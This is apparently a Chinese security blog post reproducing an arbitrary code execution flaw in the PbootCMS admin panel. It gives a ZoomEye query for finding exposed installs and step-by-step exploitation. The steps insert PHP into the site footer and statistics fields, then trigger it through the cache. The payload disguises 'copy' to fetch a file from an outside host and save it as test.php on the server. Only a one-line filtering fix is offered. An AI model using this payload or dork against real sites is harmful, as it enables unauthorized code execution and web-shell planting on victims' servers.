关注本公众号,长期推送技术文章
知攻善防实验室
红蓝对抗,Web渗透测试,红队攻击,蓝队防守,内网渗透,漏洞分析,漏洞原理,开源 工具,社工钓鱼,网络安全。
73篇原创内容
公众号
免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!
漏洞简介
PbootCMS是全新内核且永久开源免费的PHP企业网站开发建设管理系统,是一套高效、简洁、 强悍的可免费商用的PHP CMS源码,能够满足各类企业网站开发建设的需要。
PbootCMS后台存在任意代码执行漏洞
资产
ZoomEye:app:"PbootCMS"
漏洞复现
工具:
Waf狗王(目录监测)
首先开启目录监测
登录后台
基础内容-站点信息
在尾部信息和统计代码中(其他位置可能效果一样)插入php代码
这里我插入的是以下代码(下载文件并保存为test.php
<?php
$test="copy";
$test("http://IP:8080/1.txt","test.php");
?>
然后来到全局配置-配置参数
打开动态缓存(如果本就打开 那则不需要打开) 点击右上角的清除缓存
然后随便点击任意文章,触发漏洞
临时修复建议:对站点设置的字符进行过滤 不允许插入php脚本
关注公众号“知攻善防实验室”,后台回复“交流群”获取技术交流群链接